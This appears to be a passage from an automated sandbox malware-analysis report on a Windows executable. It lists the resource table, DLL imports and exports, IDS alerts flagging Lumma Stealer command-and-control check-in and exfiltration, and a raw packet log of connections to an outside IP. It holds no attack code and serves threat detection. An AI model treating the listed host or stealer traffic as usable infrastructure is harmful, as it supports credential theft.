| RT_STRING | 0x7f1260 | 0x9d0 | data | | | 0.2921974522292994 |
| RT_STRING | 0x7f1c30 | 0xa10 | data | | | 0.23951863354037267 |
| RT_STRING | 0x7f2640 | 0x808 | data | | | 0.14688715953307394 |
| RT_STRING | 0x7f2e48 | 0x858 | data | | | 0.14887640449438203 |
| RT_STRING | 0x7f36a0 | 0x898 | data | | | 0.1390909090909091 |
                                                                                                                                                                                                                              RT_STRING0x7f3f380x7a8data0.16887755102040816
                                                                                                                                                                                                                              RT_STRING0x7f46e00x944data0.12310286677908938
                                                                                                                                                                                                                              RT_STRING0x7f50240x9f4data0.12676609105180534
                                                                                                                                                                                                                              RT_STRING0x7f5a180x554data0.31085043988269795
                                                                                                                                                                                                                              RT_STRING0x7f5f6c0x370data0.42045454545454547
                                                                                                                                                                                                                              RT_STRING0x7f62dc0x3a4data0.3465665236051502
                                                                                                                                                                                                                              RT_STRING0x7f66800x320data0.43625
                                                                                                                                                                                                                              RT_STRING0x7f69a00x454data0.36101083032490977
                                                                                                                                                                                                                              RT_STRING0x7f6df40x300data0.3619791666666667
                                                                                                                                                                                                                              RT_STRING0x7f70f40x428data0.39473684210526316
                                                                                                                                                                                                                              RT_STRING0x7f751c0xd8data0.6666666666666666
                                                                                                                                                                                                                              RT_STRING0x7f75f40xd0data0.6634615384615384
                                                                                                                                                                                                                              RT_STRING0x7f76c40x310data0.44642857142857145
                                                                                                                                                                                                                              RT_STRING0x7f79d40x3acdata0.3840425531914894
                                                                                                                                                                                                                              RT_STRING0x7f7d800x3e0data0.3810483870967742
                                                                                                                                                                                                                              RT_STRING0x7f81600x50cdata0.32739938080495357
                                                                                                                                                                                                                              RT_STRING0x7f866c0x410data0.3317307692307692
                                                                                                                                                                                                                              RT_STRING0x7f8a7c0x218data0.2294776119402985
                                                                                                                                                                                                                              RT_STRING0x7f8c940x43cdata0.42066420664206644
                                                                                                                                                                                                                              RT_STRING0x7f90d00x418data0.37786259541984735
                                                                                                                                                                                                                              RT_STRING0x7f94e80x4d0data0.3741883116883117
                                                                                                                                                                                                                              RT_STRING0x7f99b80x474data0.3201754385964912
                                                                                                                                                                                                                              RT_STRING0x7f9e2c0x378data0.40765765765765766
                                                                                                                                                                                                                              RT_STRING0x7fa1a40x3b8data0.328781512605042
                                                                                                                                                                                                                              RT_STRING0x7fa55c0x40cdata0.3735521235521235
                                                                                                                                                                                                                              RT_STRING0x7fa9680xf4data0.5491803278688525
                                                                                                                                                                                                                              RT_STRING0x7faa5c0xc4data0.6275510204081632
                                                                                                                                                                                                                              RT_STRING0x7fab200x280data0.4859375
                                                                                                                                                                                                                              RT_STRING0x7fada00x434data0.3308550185873606
                                                                                                                                                                                                                              RT_STRING0x7fb1d40x360data0.3912037037037037
                                                                                                                                                                                                                              RT_STRING0x7fb5340x2dcdata0.3770491803278688
                                                                                                                                                                                                                              RT_STRING0x7fb8100x318data0.33080808080808083
                                                                                                                                                                                                                              RT_RCDATA0x7fbb280x10data1.5
                                                                                                                                                                                                                              RT_RCDATA0x7fbb380x233Zip archive data, at least v2.0 to extract, compression method=deflateEnglishUnited States0.9680284191829485
                                                                                                                                                                                                                              RT_RCDATA0x7fbd6c0x148bPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0020916524054002
                                                                                                                                                                                                                              RT_RCDATA0x7fd1f80x111ePNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0025102692834322
                                                                                                                                                                                                                              RT_RCDATA0x7fe3180xd8cPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031718569780854
                                                                                                                                                                                                                              RT_RCDATA0x7ff0a40x10e0data0.5018518518518519
                                                                                                                                                                                                                              RT_RCDATA0x8001840x4dataEnglishUnited States3.0
                                                                                                                                                                                                                              RT_RCDATA0x8001880x14d2Delphi compiled form 'TfmInfo'0.9380863039399625
                                                                                                                                                                                                                              RT_GROUP_CURSOR0x80165c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                              RT_GROUP_CURSOR0x8016700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                              RT_GROUP_CURSOR0x8016840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                              RT_GROUP_CURSOR0x8016980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                              RT_GROUP_CURSOR0x8016ac0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                              RT_GROUP_CURSOR0x8016c00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                              RT_GROUP_CURSOR0x8016d40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                              RT_GROUP_ICON0x8016e80x14dataEnglishUnited States1.1
                                                                                                                                                                                                                              RT_VERSION0x8016fc0x2e4dataEnglishUnited States0.4797297297297297
                                                                                                                                                                                                                              RT_MANIFEST0x8019e00x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

DLL | Import
winmm.dll | timeGetTime
winspool.drv | DocumentPropertiesW, ClosePrinter, OpenPrinterW, GetDefaultPrinterW, EnumPrintersW
comctl32.dll | ImageList_GetImageInfo, FlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, ImageList_Copy, FlatSB_GetScrollInfo, ImageList_Write, ImageList_DrawIndirect, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Replace, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_LoadImageW, ImageList_Draw, ImageList_Remove, ImageList_ReplaceIcon, ImageList_SetOverlayImage
shell32.dll | Shell_NotifyIconW, SHAppBarMessage, ShellExecuteW, ShellExecuteExW
user32.dll | CopyImage, SetMenuItemInfoW, GetMenuItemInfoW, DefFrameProcW, GetDlgCtrlID, FrameRect, RegisterWindowMessageW, GetMenuStringW, FillRect, SendMessageA, IsClipboardFormatAvailable, EnumWindows, ShowOwnedPopups, GetClassInfoW, GetScrollRange, SetActiveWindow, GetActiveWindow, DrawEdge, GetKeyboardLayoutList, LoadBitmapW, EnumChildWindows, GetScrollBarInfo, UnhookWindowsHookEx, SetCapture, GetCapture, ShowCaret, CreatePopupMenu, GetMenuItemID, CharLowerBuffW, PostMessageW, SetWindowLongW, IsZoomed, SetParent, DrawMenuBar, GetClientRect, IsChild, IsIconic, CallNextHookEx, ShowWindow, GetWindowTextW, SetForegroundWindow, IsDialogMessageW, DestroyWindow, RegisterClassW, EndMenu, CharNextW, GetFocus, GetDC, SetFocus, ReleaseDC, GetClassLongW, SetScrollRange, DrawTextW, PeekMessageA, MessageBeep, SetClassLongW, RemovePropW, GetSubMenu, DestroyIcon, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, LoadStringW, CreateMenu, CharLowerW, SetWindowRgn, SetWindowPos, GetMenuItemCount, GetSysColorBrush, GetWindowDC, DrawTextExW, CharLowerBuffA, EnumClipboardFormats, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, GetSysColor, EnableScrollBar, TrackPopupMenu, DrawIconEx, GetClassNameW, GetMessagePos, GetIconInfo, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, SetCursorPos, GetCursorPos, SetMenu, GetMenuState, GetMenu, SetRect, GetKeyState, ValidateRect, GetCursor, KillTimer, WaitMessage, TranslateMDISysAccel, GetWindowPlacement, CreateIconIndirect, CreateWindowExW, GetDCEx, PeekMessageW, MonitorFromWindow, GetUpdateRect, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, MapVirtualKeyW, IsWindowUnicode, DispatchMessageW, CreateAcceleratorTableW, DefMDIChildProcW, GetSystemMenu, SetScrollPos, GetScrollPos, DrawFocusRect, ReleaseCapture, LoadCursorW, ScrollWindow, GetLastActivePopup, GetSystemMetrics, CharUpperBuffW, SetClipboardData, GetClipboardData, ClientToScreen, SetWindowPlacement, GetMonitorInfoW, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, EnableWindow, GetWindowThreadProcessId, RedrawWindow, EndPaint, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, ActivateKeyboardLayout, GetParent, InsertMenuItemW, MonitorFromRect, GetPropW, MessageBoxW, SetPropW, UpdateWindow, MsgWaitForMultipleObjects, DestroyMenu, SetWindowsHookExW, EmptyClipboard, AdjustWindowRectEx, IsWindow, DrawIcon, EnumThreadWindows, InvalidateRect, GetKeyboardState, ScreenToClient, DrawFrameControl, SetCursor, CreateIcon, RemoveMenu, GetKeyboardLayoutNameW, OpenClipboard, TranslateMessage, MapWindowPoints, EnumDisplayMonitors, CountClipboardFormats, CallWindowProcW, CloseClipboard, DestroyCursor, CopyIcon, CharUpperBuffA, PostQuitMessage, ShowScrollBar, LoadImageW, EnableMenuItem, HideCaret, FindWindowExW, LoadIconW, SystemParametersInfoW, MonitorFromPoint, GetWindow, GetWindowRect, GetWindowLongW, InsertMenuW, IsWindowEnabled, IsDialogMessageA, FindWindowW, GetKeyboardLayout, DeleteMenu
version.dll | GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
oleaut32.dll | SafeArrayPutElement, SetErrorInfo, GetErrorInfo, VariantInit, VariantClear, SysFreeString, SafeArrayAccessData, SysReAllocStringLen, SafeArrayCreate, CreateErrorInfo, SafeArrayGetElement, SysAllocStringLen, SafeArrayUnaccessData, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetUBound, SafeArrayGetLBound, VariantChangeType
WTSAPI32.DLL | WTSUnRegisterSessionNotification, WTSRegisterSessionNotification
advapi32.dll | RegSetValueExW, RegConnectRegistryW, RegEnumKeyExW, RegLoadKeyW, RegDeleteKeyW, RegOpenKeyExW, RegQueryInfoKeyW, RegOpenKeyExA, RegUnLoadKeyW, RegSaveKeyW, RegDeleteValueW, RegReplaceKeyW, RegFlushKey, RegEnumValueW, RegQueryValueExW, RegQueryValueExA, RegCloseKey, RegCreateKeyExW, RegRestoreKeyW
msvcrt.dll | memcpy, memset
kernel32.dll | SetFileAttributesW, GetFileType, SetFileTime, QueryDosDeviceW, GetACP, GetExitCodeProcess, GetStringTypeExW, CloseHandle, LocalFree, GetCurrentProcessId, GetSystemDefaultLangID, SizeofResource, UpdateResourceW, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, GlobalSize, GetLongPathNameW, RtlUnwind, GetCPInfo, EnumSystemLocalesW, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, SystemTimeToTzSpecificLocalTime, GetModuleHandleW, FreeLibrary, TryEnterCriticalSection, HeapDestroy, FileTimeToDosDateTime, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, GlobalAlloc, GlobalUnlock, FindResourceW, CreateThread, CompareStringW, MapViewOfFile, LoadLibraryA, GetVolumeInformationW, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, GlobalAddAtomW, FormatMessageW, OpenProcess, SwitchToThread, GetExitCodeThread, OutputDebugStringW, GetCurrentThread, GetLogicalDrives, GetFileAttributesExW, LoadLibraryExW, TerminateProcess, LockResource, BeginUpdateResourceW, FileTimeToSystemTime, GetCurrentThreadId, UnhandledExceptionFilter, GlobalFindAtomW, VirtualQuery, GlobalFree, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, GetStringTypeExA, LoadResource, SuspendThread, GetTickCount, EnumResourceLanguagesW, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, SetCurrentDirectoryW, GetCurrentDirectoryW, InitializeCriticalSection, GetThreadPriority, GetCurrentProcess, GlobalLock, SetThreadPriority, VirtualAlloc, GetTempPathW, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetLogicalDriveStringsW, GetVersionExW, VerifyVersionInfoW, HeapCreate, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, GetConsoleOutputCP, UnmapViewOfFile, GetConsoleCP, lstrlenW, CompareStringA, QueryPerformanceCounter, SetEndOfFile, InitializeCriticalSectionAndSpinCount, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, GetLocaleInfoW, CreateFileW, SystemTimeToFileTime, EnumResourceNamesW, DeleteFileW, IsDBCSLeadByteEx, GetLocalTime, WaitForSingleObject, GetOEMCP, WriteFile, CreateFileMappingW, ExitThread, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, TzSpecificLocalTimeToSystemTime, IsValidLocale, SleepEx, TlsSetValue, EndUpdateResourceW, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, RemoveDirectoryW, CreateEventW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
SHFolder.dll | SHGetFolderPathW
ole32.dll | IsEqualGUID, OleInitialize, OleUninitialize, CoInitialize, CoCreateInstance, CoUninitialize, CoTaskMemFree, CoTaskMemAlloc
gdi32.dll | AddFontMemResourceEx, Pie, SetBkMode, CreateCompatibleBitmap, GetEnhMetaFileHeader, CloseEnhMetaFile, RectVisible, AngleArc, ResizePalette, SetAbortProc, SetTextColor, StretchBlt, RoundRect, RestoreDC, SetRectRgn, GetTextMetricsW, GetWindowOrgEx, CreatePalette, CreateDCW, PolyBezierTo, CreateICW, GetStockObject, CreateSolidBrush, Polygon, MoveToEx, PlayEnhMetaFile, Ellipse, StartPage, GetBitmapBits, StartDocW, AbortDoc, GetSystemPaletteEntries, GetEnhMetaFileBits, GetEnhMetaFilePaletteEntries, CreatePenIndirect, CreateFontIndirectW, PolyBezier, RemoveFontResourceExW, EndDoc, GetObjectW, GetWinMetaFileBits, SetROP2, GetOutlineTextMetricsW, GetEnhMetaFileDescriptionW, ArcTo, GetKerningPairs, CreateEnhMetaFileW, Arc, SelectPalette, SetGraphicsMode, ExcludeClipRect, MaskBlt, SetWindowOrgEx, EndPage, DeleteEnhMetaFile, Chord, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, GetGlyphOutlineW, CreateBrushIndirect, PatBlt, SetEnhMetaFileBits, AddFontResourceExW, Rectangle, SaveDC, DeleteDC, GetWorldTransform, BitBlt, SetWorldTransform, FrameRgn, GetDeviceCaps, GetTextExtentPoint32W, GetClipBox, IntersectClipRect, Polyline, CreateBitmap, CombineRgn, SetWinMetaFileBits, GetStretchBltMode, CreateDIBitmap, SetStretchBltMode, GetDIBits, CreateDIBSection, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, SelectObject, DeleteObject, ExtFloodFill, UnrealizeObject, CopyEnhMetaFileW, SetBkColor, CreateCompatibleDC, GetObjectA, GetBrushOrgEx, GetCurrentPositionEx, GetNearestPaletteIndex, RemoveFontMemResourceEx, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, GdiFlush, SetPixel, EnumFontFamiliesExW, StretchDIBits, GetPaletteEntries

Name | Ordinal | Address
__dbk_fcall_wrapper | 2 | 0x412764
dbkFCallWrapperAddr | 1 | 0x948644

Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-18T00:15:22.667750+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49704 | 172.67.131.254 | 443 | TCP
2024-11-18T00:15:23.279515+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.16 | 49704 | 172.67.131.254 | 443 | TCP
2024-11-18T00:15:23.279515+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.16 | 49704 | 172.67.131.254 | 443 | TCP
2024-11-18T00:15:24.184664+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49706 | 172.67.131.254 | 443 | TCP
2024-11-18T00:15:24.725081+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.16 | 49706 | 172.67.131.254 | 443 | TCP
2024-11-18T00:15:24.725081+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.16 | 49706 | 172.67.131.254 | 443 | TCP
2024-11-18T00:15:25.926360+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49707 | 172.67.131.254 | 443 | TCP
2024-11-18T00:15:27.372592+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49708 | 172.67.131.254 | 443 | TCP
2024-11-18T00:15:28.840912+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49709 | 172.67.131.254 | 443 | TCP
2024-11-18T00:15:30.463927+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49710 | 172.67.131.254 | 443 | TCP
2024-11-18T00:15:31.771417+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49711 | 172.67.131.254 | 443 | TCP
2024-11-18T00:15:32.288914+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.16 | 49711 | 172.67.131.254 | 443 | TCP
2024-11-18T00:15:33.112356+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49712 | 172.67.131.254 | 443 | TCP
2024-11-18T00:15:34.414146+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49713 | 172.67.131.254 | 443 | TCP
2024-11-18T00:15:35.490437+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49714 | 172.67.131.254 | 443 | TCP
2024-11-18T00:15:36.027674+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.16 | 49714 | 172.67.131.254 | 443 | TCP
2024-11-18T00:15:36.680327+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49715 | 172.67.185.54 | 443 | TCP
2024-11-18T00:15:38.963659+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49716 | 172.67.185.54 | 443 | TCP
2024-11-18T00:15:43.503073+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49717 | 172.67.185.54 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.214826107 CET44349709172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.214920044 CET49709443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.215198040 CET49709443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.215213060 CET44349709172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.840820074 CET44349709172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.840912104 CET49709443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.842084885 CET49709443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.842093945 CET44349709172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.842582941 CET44349709172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.843735933 CET49709443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.843863010 CET49709443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.843894005 CET44349709172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.843971014 CET49709443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.843976974 CET44349709172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:29.603629112 CET44349709172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:29.603905916 CET49709443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:29.846448898 CET49710443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:29.846548080 CET44349710172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:29.846631050 CET49710443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:29.846916914 CET49710443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:29.846952915 CET44349710172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:30.463799000 CET44349710172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:30.463927031 CET49710443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:30.465462923 CET49710443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:30.465508938 CET44349710172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:30.466248989 CET44349710172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:30.467463017 CET49710443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:30.467636108 CET49710443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:30.467686892 CET44349710172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.066644907 CET44349710172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.066884041 CET44349710172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.066888094 CET49710443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.066945076 CET49710443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.141978979 CET49711443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.142018080 CET44349711172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.142087936 CET49711443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.142359018 CET49711443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.142371893 CET44349711172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.771137953 CET44349711172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.771416903 CET49711443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.774873018 CET49711443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.774883032 CET44349711172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.775377989 CET44349711172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.776602030 CET49711443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.776746988 CET49711443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.776777983 CET44349711172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:32.288935900 CET44349711172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:32.289186001 CET44349711172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:32.289352894 CET49711443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:32.290678024 CET49711443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:32.290699959 CET44349711172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:32.492495060 CET49712443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:32.492533922 CET44349712172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:32.492609978 CET49712443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:32.493061066 CET49712443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:32.493074894 CET44349712172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.112265110 CET44349712172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.112355947 CET49712443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.113966942 CET49712443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.113981962 CET44349712172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.114372015 CET44349712172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.115578890 CET49712443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.115705967 CET49712443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.115714073 CET44349712172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.639472961 CET44349712172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.639734983 CET44349712172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.639874935 CET49712443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.639874935 CET49712443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.639909983 CET44349712172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.770396948 CET49713443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.770490885 CET44349713172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.770606995 CET49713443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.770912886 CET49713443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.770947933 CET44349713172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.414024115 CET44349713172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.414145947 CET49713443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.415307999 CET49713443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.415328026 CET44349713172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.415680885 CET44349713172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.417241096 CET49713443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.417380095 CET49713443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.417386055 CET44349713172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.800081968 CET44349713172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.800246954 CET44349713172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.800326109 CET49713443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.800407887 CET49713443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.800434113 CET44349713172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.833964109 CET49714443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.834005117 CET44349714172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.834111929 CET49714443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.834342957 CET49714443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.834356070 CET44349714172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:35.490267992 CET44349714172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:35.490437031 CET49714443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:35.491589069 CET49714443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:35.491600037 CET44349714172.67.131.254192.168.2.16
